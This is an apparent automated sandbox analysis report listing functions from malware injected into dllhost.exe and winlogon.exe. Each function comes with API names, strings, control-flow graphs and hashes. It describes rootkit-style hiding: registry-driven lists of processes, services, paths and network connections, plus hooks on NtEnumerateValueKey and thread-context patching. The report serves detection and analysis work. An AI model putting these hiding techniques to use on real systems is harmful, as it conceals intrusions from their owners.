                                                                  Function 00000001400017A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Delete$CloseEnumOpen
                                                                  • String ID: SOFTWARE\dialerconfig
                                                                  • API String ID: 3013565938-461861421
                                                                  • Opcode ID: 3546dc44df7e8b158bd6bb68c849f6718ea14c1894578f294c0a39a5e3694e51
                                                                  • Instruction ID: 46bba928c240728d338613b8de0f0c529c8f41473f23169f90678cf934e6a2b6
                                                                  • Opcode Fuzzy Hash: 3546dc44df7e8b158bd6bb68c849f6718ea14c1894578f294c0a39a5e3694e51
                                                                  • Instruction Fuzzy Hash: 891170B2614A8485E762CF26F8447E923B4F78C7D8F405205EB5D0BAA9DF7CC258CB18
                                                                  Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: 73bbda701e0c7dde8a9bb72d8052321e3a2b93cd57bfc5b7ac7be5e90a89b24a
                                                                  • Instruction ID: bfc98151d4b55344812eebf6c0d33986cba51fe62d4fd4ad2f52b553ca81b4e9
                                                                  • Opcode Fuzzy Hash: 73bbda701e0c7dde8a9bb72d8052321e3a2b93cd57bfc5b7ac7be5e90a89b24a
                                                                  • Instruction Fuzzy Hash: 4D015AB2600A80D6E705EF67F90438A77A0F78CBC4F494425BB994373ADE38C051C744
                                                                  Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: ntdll.dll
                                                                  • API String ID: 1646373207-2227199552
                                                                  • Opcode ID: 194e60043ded67e07100df29ab3cf77ef87a9a245bef3bebfeeac3078f3da2c5
                                                                  • Instruction ID: 25cfabea84f4b80a2e2eb0d312c031e38d099179bfd8722b5fa94ad88c6eb4a5
                                                                  • Opcode Fuzzy Hash: 194e60043ded67e07100df29ab3cf77ef87a9a245bef3bebfeeac3078f3da2c5
                                                                  • Instruction Fuzzy Hash: 71D0C9F871260182EF2AEB6778553E152515B6DBD5F4940209F0647772DE38C0D48218
                                                                  Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                                  • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                                  • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                                  • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                                  Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                                  • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                                  • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                                  • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                                  Executed Functions

                                                                  Function 00000225DC642990 Relevance: 3.1, APIs: 2, Instructions: 64nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 263 225dc642990-225dc6429da NtEnumerateValueKey 264 225dc6429dc-225dc6429df 263->264 265 225dc642a38-225dc642a56 263->265 264->265 266 225dc6429e1-225dc6429e3 264->266 267 225dc6429e6-225dc6429e8 266->267 267->265 268 225dc6429ea-225dc642a09 NtEnumerateValueKey 267->268 269 225dc642a1a 268->269 270 225dc642a0b-225dc642a0e 268->270 273 225dc642a1e-225dc642a36 call 225dc643c74 269->273 271 225dc642a14-225dc642a18 270->271 272 225dc642a10-225dc642a12 270->272 271->273 272->273 273->265 273->267
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: EnumerateValue
                                                                  • String ID:
                                                                  • API String ID: 1749906896-0
                                                                  • Opcode ID: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                                  • Instruction ID: 84a77b9bb0afbf59611d0fa3fd5c5f0fab25569c8fb70d3f3086e3ec9d703967
                                                                  • Opcode Fuzzy Hash: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                                  • Instruction Fuzzy Hash: 9E21063A31CB6196E375CF8AA84462EB7A4F384F95F628159DE9653B54DF34C481C700
                                                                  Function 00000225DC641628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: a2d6af49bfb468c6323ae30e83388f277792ce270a6e7da95958c0977ad93538
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: 50713E7A328E60A6EB109FE9E85869D33B4F784F9AF509111DE4E47B68EF34C444C740
                                                                  Function 00000225DC643BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 5ebfe231e3b5998aca6e229cc949323c5c65e22de211b62673f532ffd030ceb8
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: 25118E2A318B5092EB549BA9E4483697261F748F96F148438DF8E07754EF3DC544C704
                                                                  Function 00000225DC645F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 57 225dc645f60-225dc645f87 58 225dc645f89-225dc645f98 57->58 59 225dc645f9b-225dc645fa6 GetCurrentThreadId 57->59 58->59 60 225dc645fa8-225dc645fad 59->60 61 225dc645fb2-225dc645fb9 59->61 62 225dc6463df-225dc6463f6 call 225dc647d70 60->62 63 225dc645fcb-225dc645fdf 61->63 64 225dc645fbb-225dc645fc6 call 225dc645d90 61->64 67 225dc645fee-225dc645ff4 63->67 64->62 70 225dc645ffa-225dc646003 67->70 71 225dc6460c5-225dc6460e6 67->71 73 225dc64604a-225dc6460bd call 225dc644940 call 225dc6448e0 call 225dc6448a0 70->73 74 225dc646005-225dc646048 call 225dc6489f0 70->74 76 225dc6460ec-225dc64610c GetThreadContext 71->76 77 225dc64624f-225dc646260 call 225dc6478ef 71->77 87 225dc6460c0 73->87 74->87 80 225dc64624a 76->80 81 225dc646112-225dc646133 76->81 91 225dc646265-225dc64626b 77->91 80->77 81->80 90 225dc646139-225dc646142 81->90 87->67 95 225dc6461c2-225dc6461d3 90->95 96 225dc646144-225dc646155 90->96 92 225dc646271-225dc6462c8 VirtualProtect FlushInstructionCache 91->92 93 225dc64632e-225dc64633e 91->93 97 225dc6462f9-225dc646329 call 225dc647cdc 92->97 98 225dc6462ca-225dc6462d4 92->98 102 225dc64634e-225dc64635a call 225dc645220 93->102 103 225dc646340-225dc646347 93->103 99 225dc646245 95->99 100 225dc6461d5-225dc6461f3 95->100 104 225dc646157-225dc64616c 96->104 105 225dc6461bd 96->105 97->91 98->97 106 225dc6462d6-225dc6462f1 call 225dc6447c0 98->106 100->99 107 225dc6461f5-225dc646240 call 225dc643d30 call 225dc64790d 100->107 121 225dc64635f-225dc646365 102->121 103->102 109 225dc646349 call 225dc644810 103->109 104->105 111 225dc64616e-225dc6461b8 call 225dc643da0 SetThreadContext 104->111 105->99 106->97 107->99 109->102 111->105 122 225dc6463a7-225dc6463c5 121->122 123 225dc646367-225dc6463a5 ResumeThread call 225dc647cdc 121->123 126 225dc6463d9 122->126 127 225dc6463c7-225dc6463d6 122->127 123->121 126->62 127->126
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 2c9875a4be257d71c1bbafe5528e600240430df731cdbb341610095cc3b88c53
                                                                  • Instruction ID: 2e21bb73cee3d71e79c9cd6234793ef84b45f6acac65b4cfa46dbbb6eb0919c0
                                                                  • Opcode Fuzzy Hash: 2c9875a4be257d71c1bbafe5528e600240430df731cdbb341610095cc3b88c53
                                                                  • Instruction Fuzzy Hash: 50D19A7A20CF9896DA70DB8AE49835A77A0F3C8B85F104156EACE47BA5DF7CC541CB00
                                                                  Function 00000225DC645500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 129 225dc645500-225dc64552c 130 225dc64553d-225dc645546 129->130 131 225dc64552e-225dc645536 129->131 132 225dc645557-225dc645560 130->132 133 225dc645548-225dc645550 130->133 131->130 134 225dc645571-225dc64557a 132->134 135 225dc645562-225dc64556a 132->135 133->132 136 225dc64557c-225dc645581 134->136 137 225dc645586-225dc645591 GetCurrentThreadId 134->137 135->134 138 225dc645b03-225dc645b0a 136->138 139 225dc645593-225dc645598 137->139 140 225dc64559d-225dc6455a4 137->140 139->138 141 225dc6455a6-225dc6455ac 140->141 142 225dc6455b1-225dc6455ba 140->142 141->138 143 225dc6455bc-225dc6455c1 142->143 144 225dc6455c6-225dc6455d2 142->144 143->138 145 225dc6455d4-225dc6455f9 144->145 146 225dc6455fe-225dc645655 call 225dc645b10 * 2 144->146 145->138 151 225dc64566a-225dc645673 146->151 152 225dc645657-225dc64565e 146->152 155 225dc645685-225dc64568e 151->155 156 225dc645675-225dc645682 151->156 153 225dc645666 152->153 154 225dc645660 152->154 158 225dc6456d6-225dc6456da 153->158 157 225dc6456e0-225dc6456e6 154->157 159 225dc6456a3-225dc6456c8 call 225dc647ca0 155->159 160 225dc645690-225dc6456a0 155->160 156->155 162 225dc645715-225dc64571b 157->162 163 225dc6456e8-225dc645704 call 225dc6447c0 157->163 158->157 168 225dc64575d-225dc645772 call 225dc6440f0 159->168 169 225dc6456ce 159->169 160->159 166 225dc645745-225dc645758 162->166 167 225dc64571d-225dc64573c call 225dc647cdc 162->167 163->162 173 225dc645706-225dc64570e 163->173 166->138 167->166 176 225dc645781-225dc64578a 168->176 177 225dc645774-225dc64577c 168->177 169->158 173->162 178 225dc64579c-225dc6457ea call 225dc649090 176->178 179 225dc64578c-225dc645799 176->179 177->158 182 225dc6457f2-225dc6457fa 178->182 179->178 183 225dc645907-225dc64590f 182->183 184 225dc645800-225dc6458eb call 225dc647870 182->184 185 225dc645911-225dc645924 call 225dc6449c0 183->185 186 225dc645953-225dc64595b 183->186 196 225dc6458ed 184->196 197 225dc6458ef-225dc6458fe call 225dc644490 184->197 200 225dc645926 185->200 201 225dc645928-225dc645951 185->201 189 225dc645967-225dc645976 186->189 190 225dc64595d-225dc645965 186->190 194 225dc645978 189->194 195 225dc64597f 189->195 190->189 193 225dc645984-225dc645991 190->193 198 225dc645993 193->198 199 225dc645994-225dc6459e9 call 225dc6489f0 193->199 194->195 195->193 196->183 205 225dc645902 197->205 206 225dc645900 197->206 198->199 208 225dc6459eb-225dc6459f3 199->208 209 225dc6459f8-225dc645a91 call 225dc644940 call 225dc6448a0 VirtualProtect 199->209 200->186 201->183 205->182 206->183 214 225dc645aa1-225dc645b01 209->214 215 225dc645a93-225dc645a98 GetLastError 209->215 214->138 215->214
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 0484fdcd3f842ffe2eb8cf6abe3111b51bf2a7d82943804f644aff27e1a59f59
                                                                  • Instruction ID: 497ad16e15aeee416df0bddaacebb39c200c4c2ee8fa882154d46654e74b9134
                                                                  • Opcode Fuzzy Hash: 0484fdcd3f842ffe2eb8cf6abe3111b51bf2a7d82943804f644aff27e1a59f59
                                                                  • Instruction Fuzzy Hash: FB02E93621DF9496EBA0CB99E49835AB7A1F3C5795F104056EA8E87BA8DF7CC444CB00
                                                                  Function 00000225DC612AC0 Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 3316853933-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: 0526b13a4640494a154737fd18b208aeadbfaa7a845f4f4111ac3a2fd46cdc36
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: 9091487AB02A6097EF66CF69D008B6DB3A1F754B9BF54C125DF0A47788DA38D852C700
                                                                  Function 00000225DC643E10 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocQuery
                                                                  • String ID:
                                                                  • API String ID: 31662377-0
                                                                  • Opcode ID: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
                                                                  • Instruction ID: c8307eed51a542c14115f8f3d212823eb754a030e29d743a42d646e143d38ee7
                                                                  • Opcode Fuzzy Hash: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
                                                                  • Instruction Fuzzy Hash: A131212521DE98D1EA70DB9DE05835AB2A0F388B85F108575F6CF46BA8DF7DC581CB00
                                                                  Function 00000225DC643620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 00000225DC643639
                                                                  • PathFindFileNameW.SHLWAPI ref: 00000225DC643648
                                                                    • Part of subcall function 00000225DC643C74: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64254B), ref: 00000225DC643C8C
                                                                    • Part of subcall function 00000225DC643BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643BCE
                                                                    • Part of subcall function 00000225DC643BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643BFC
                                                                    • Part of subcall function 00000225DC643BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643C1E
                                                                    • Part of subcall function 00000225DC643BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643C39
                                                                    • Part of subcall function 00000225DC643BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643C5A
                                                                  • CreateThread.KERNELBASE ref: 00000225DC64368F
                                                                    • Part of subcall function 00000225DC641D40: GetCurrentThread.KERNEL32 ref: 00000225DC641D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: cb6c25e1d175d1ab828ac87d865260820c1993d6885dbca23a44a31068f7e984
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: FE11757862CE3662FB60ABECE50D3593291B755B57F50C1B59607856D5EF7CC048CA00
                                                                  Function 00000225DC645220 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 3733156554-0
                                                                  • Opcode ID: 3cd42903cdcc5958fd6b3f80d03c4f8cc262e2c27ec8a819bb88f8b744014d6b
                                                                  • Instruction ID: aabe0a8065b1290ac19efed51260d016298b09264276fd75c2282f6936c50693
                                                                  • Opcode Fuzzy Hash: 3cd42903cdcc5958fd6b3f80d03c4f8cc262e2c27ec8a819bb88f8b744014d6b
                                                                  • Instruction Fuzzy Hash: 5CF0173A61CE2490D670AB89E44934A77A0E3887D5F148152BA8E43B69DB38C280CF00
                                                                  Function 00000225DC641AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                                    • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416B2
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416DF
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641719
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC641734
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641754
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64178F
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417CA
                                                                  • SleepEx.KERNELBASE ref: 00000225DC641AE3
